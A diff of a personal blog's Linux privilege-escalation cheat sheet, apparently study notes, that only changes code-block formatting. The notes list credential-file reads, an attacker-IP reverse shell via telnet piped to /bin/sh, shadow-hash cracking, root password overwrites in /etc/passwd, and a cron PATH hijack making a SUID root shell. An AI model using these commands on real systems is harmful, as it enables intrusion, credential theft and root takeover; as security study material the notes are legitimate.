--- a/_posts/notes/system/2022-04-25-linux-pe.md
+++ b/_posts/notes/system/2022-04-25-linux-pe.md
@@ -4,11 +4,11 @@ title: 'Notes | Linux Privilage Escalation'
 permalink: /notes/system/linux-privilage-escalation/
 ---
 
-# [](#header-4)Guess OS
+# Guess OS
 We can try the following commands:
 
 - Distribution
-{% highlight plain %}
+{% highlight bash %}
 > cat /etc/issue
 > cat /etc/*-release
 > cat /etc/lsb-release
@@ -16,7 +16,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Kernel version
-{% highlight plain %}
+{% highlight bash %}
 > cat /proc/version
 > uname -a
 > uname -mrs
@@ -26,7 +26,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Environmental variables
-{% highlight plain %}
+{% highlight bash %}
 > cat /etc/profile
 > cat /etc/bashrc
 > cat ~/.bash_profile
@@ -37,13 +37,13 @@ We can try the following commands:
 {% endhighlight %}
 
 - Printer?
-{% highlight plain %}
+{% highlight bash %}
 > lpstat -a
 {% endhighlight %}
 
-# [](#header-4)Apps and services
+# Apps and services
 - Services running and privileges
-{% highlight plain %}
+{% highlight bash %}
 > ps aux
 > ps -ef
 > top
@@ -51,13 +51,13 @@ We can try the following commands:
 {% endhighlight %}
 
 - Services running by root
-{% highlight plain %}
+{% highlight bash %}
 > ps aux | grep root
 > ps -ef | grep root
 {% endhighlight %}
 
 - Apps installed, version and running
-{% highlight plain %}
+{% highlight bash %}
 > ls -alh /usr/bin/
 > ls -alh /sbin/
 > dpkg -l
@@ -67,7 +67,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Services misconfigured, vulnerables plugins
-{% highlight plain %}
+{% highlight bash %}
 > cat /etc/syslog.conf
 > cat /etc/chttp.conf
 > cat /etc/lighttpd.conf
@@ -81,7 +81,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Jobs
-{% highlight plain %}
+{% highlight bash %}
 > crontab -l
 > ls -alh /var/spool/cron
 > ls -al /etc/ | grep cron
@@ -96,25 +96,25 @@ We can try the following commands:
 > cat /var/spool/cron/crontabs/root
 {% endhighlight %}
 
-- Plain users/passwords
-{% highlight plain %}
+- bash users/passwords
+{% highlight bash %}
 > grep -i user [filename]
 > grep -i pass [filename]
 > grep -C 5 "password" [filename]
 > find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
 {% endhighlight %}
 
-# [](#header-4)Comms and networking
+# Comms and networking
 
 - NICs and connections
-{% highlight plain %}
+{% highlight bash %}
 > /sbin/ifconfig -a
 > cat /etc/network/interfaces
 > cat /etc/sysconfig/network
 {% endhighlight %}
 
 - Network configuration, DHCP, DNS, Gateaway
-{% highlight plain %}
+{% highlight bash %}
 > cat /etc/resolv.conf
 > cat /etc/sysconfig/network
 > cat /etc/networks
@@ -124,7 +124,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Users and host communicating
-{% highlight plain %}
+{% highlight bash %}
 > lsof -i
 > lsof -i :80
 > grep 80 /etc/services
@@ -138,26 +138,26 @@ We can try the following commands:
 {% endhighlight %}
 
 - Cache
-{% highlight plain %}
+{% highlight bash %}
 > arp -e
 > route
 > /sbin/route -nee
 {% endhighlight %}
 
 - Packet sniffing
-{% highlight plain %}
+{% highlight bash %}
 > tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
 {% endhighlight %}
 
 - Shell
-{% highlight plain %}
+{% highlight bash %}
 > nc -lvp 4444    # Attacker. Input (Commands)
 > nc -lvp 4445    # Attacker. Ouput (Results)
 > telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!
 {% endhighlight %}
 
 - Port forwading
-{% highlight plain %}
+{% highlight bash %}
 > FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
 
 > ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
@@ -169,15 +169,15 @@ We can try the following commands:
 {% endhighlight %}
 
 - Tunneling
-{% highlight plain %}
+{% highlight bash %}
 > ssh -D 127.0.0.1:9050 -N [username]@[ip]
 > proxychains ifconfig
 {% endhighlight %}
 
-# [](#header-4)Confidential information and users
+# Confidential information and users
 
 - Logins
-{% highlight plain %}
+{% highlight bash %}
 > id
 > who
 > w
@@ -190,7 +190,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Sensitive files
-{% highlight plain %}
+{% highlight bash %}
 > cat /etc/passwd
 > cat /etc/group
 > cat /etc/shadow
@@ -198,20 +198,20 @@ We can try the following commands:
 {% endhighlight %}
 
 - Home directory
-{% highlight plain %}
+{% highlight bash %}
 > ls -ahlR /root/
 > ls -ahlR /home/
 {% endhighlight %}
 
 - Passwords
-{% highlight plain %}
+{% highlight bash %}
 > cat /var/apache2/config.inc
 > cat /var/lib/mysql/mysql/user.MYD
 > cat /root/anaconda-ks.cfg
 {% endhighlight %}
 
 - History
-{% highlight plain %}
+{% highlight bash %}
 > cat ~/.bash_history
 > cat ~/.nano_history
 > cat ~/.atftp_history
@@ -220,7 +220,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - User information
-{% highlight plain %}
+{% highlight bash %}
 > cat ~/.bashrc
 > cat ~/.profile
 > cat /var/mail/root
@@ -228,7 +228,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Private key
-{% highlight plain %}
+{% highlight bash %}
 > cat ~/.ssh/authorized_keys
 > cat ~/.ssh/identity.pub
 > cat ~/.ssh/identity
@@ -246,9 +246,9 @@ We can try the following commands:
 > cat /etc/ssh/ssh_host_key
 {% endhighlight %}
 
-# [](#header-4)File System
+# File System
 - **/etc/** write
-{% highlight plain %}
+{% highlight bash %}
 > ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
 > ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
 > ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
@@ -259,7 +259,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - List **/var/**
-{% highlight plain %}
+{% highlight bash %}
 > ls -alh /var/log
 > ls -alh /var/mail
 > ls -alh /var/spool
@@ -270,7 +270,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Hidden files
-{% highlight plain %}
+{% highlight bash %}
 > ls -alhR /var/www/
 > ls -alhR /srv/www/htdocs/
 > ls -alhR /usr/local/www/apache22/data/
@@ -279,7 +279,7 @@ We can try the following commands:
 {% endhighlight %}
 
 - Logs
-{% highlight plain %}
+{% highlight bash %}
 > cat /etc/httpd/logs/access_log
 > cat /etc/httpd/logs/access.log
 > cat /etc/httpd/logs/error_log
@@ -323,21 +323,21 @@ Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.
 {% endhighlight %}
 
 - Break jail
-{% highlight plain %}
+{% highlight bash %}
 > python -c 'import pty;pty.spawn("/bin/bash")'
 > echo os.system('/bin/bash')
 > /bin/sh -i
 {% endhighlight %}
 
 - Mount
-{% highlight plain %}
+{% highlight bash %}
 > mount
 > df -h
 > cat /etc/fstab
 {% endhighlight %}
 
 - Sticky bits, SUID, GUID
-{% highlight plain %}
+{% highlight bash %}
 > find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
 > find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
 > find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
@@ -349,7 +349,7 @@ Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.
 {% endhighlight %}
 
 - Write permission
-{% highlight plain %}
+{% highlight bash %}
 > find / -writable -type d 2>/dev/null      # world-writeable folders
 > find / -perm -222 -type d 2>/dev/null     # world-writeable folders
 > find / -perm -o w -type d 2>/dev/null     # world-writeable folders
@@ -360,14 +360,14 @@ Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.
 {% endhighlight %}
 
 - Word-writeable, nobody files
-{% highlight plain %}
+{% highlight bash %}
 > find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
 > find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files
 {% endhighlight %}
 
-# [](#header-4)Finding exploit code
+# Finding exploit code
 - Languages installed
-{% highlight plain %}
+{% highlight bash %}
 > find / -name perl*
 > find / -name python*
 > find / -name gcc*
@@ -375,7 +375,7 @@ Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.
 {% endhighlight %}
 
 - Files uploaded
-{% highlight plain %}
+{% highlight bash %}
 > find / -name wget
 > find / -name nc*
 > find / -name netcat*
@@ -385,43 +385,43 @@ Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.
 
 > [Source](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 
-# [](#header-4)Explotation
+# Explotation
 
-### [](#header-4)/etc/shadow
+### /etc/shadow
 If we can read the file **/etc/shadow** we can try to break the hashes with **john**:
-{% highlight plain %}
+{% highlight bash %}
 > john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
 {% endhighlight %}
 
 If **/etc/shadow** is writeable we can change the passwords. First we need to generate one:
-{% highlight plain %}
+{% highlight bash %}
 > mkpasswd -m -sha-512 [password]
 {% endhighlight %}
 And then replace the hash.
 
-### [](#header-4)/etc/passwd
+### /etc/passwd
 If we can write in **/etc/passwd** we can change the password:
-{% highlight plain %}
+{% highlight bash %}
 > openssl passwd [password]
 {% endhighlight %}
 Then we replace the **x** in the same line as the root with the hash, now we can log as root.
 
-### [](#header-4)PATH and crontab
+### PATH and crontab
 If in the **/etc/crontab** we have the PATH with the **/home/user** we can create the following script in the home:
-{% highlight plain %}
+{% highlight bash %}
 #!/bin/bash
 
 cp /bin/bash /tmp/rootbash
 chmod +xs /tmp/rootbash
 {% endhighlight %}
 We need to give execution permission and wait to the crontab to execute the file. Then do
-{% highlight plain %}
+{% highlight bash %}
 > /tmp/rootbash -p
 {% endhighlight %}
 Now we are root.
 
 
-# [](#header-4)Tools
+# Tools
 - [linPEAS](https://github.com/carlospolop/PEASS-ng/blob/master/linPEAS/)
 - [Kernel Vulnerabilities](https://github.com/jondonas/linux-exploit-suggester-2)
 
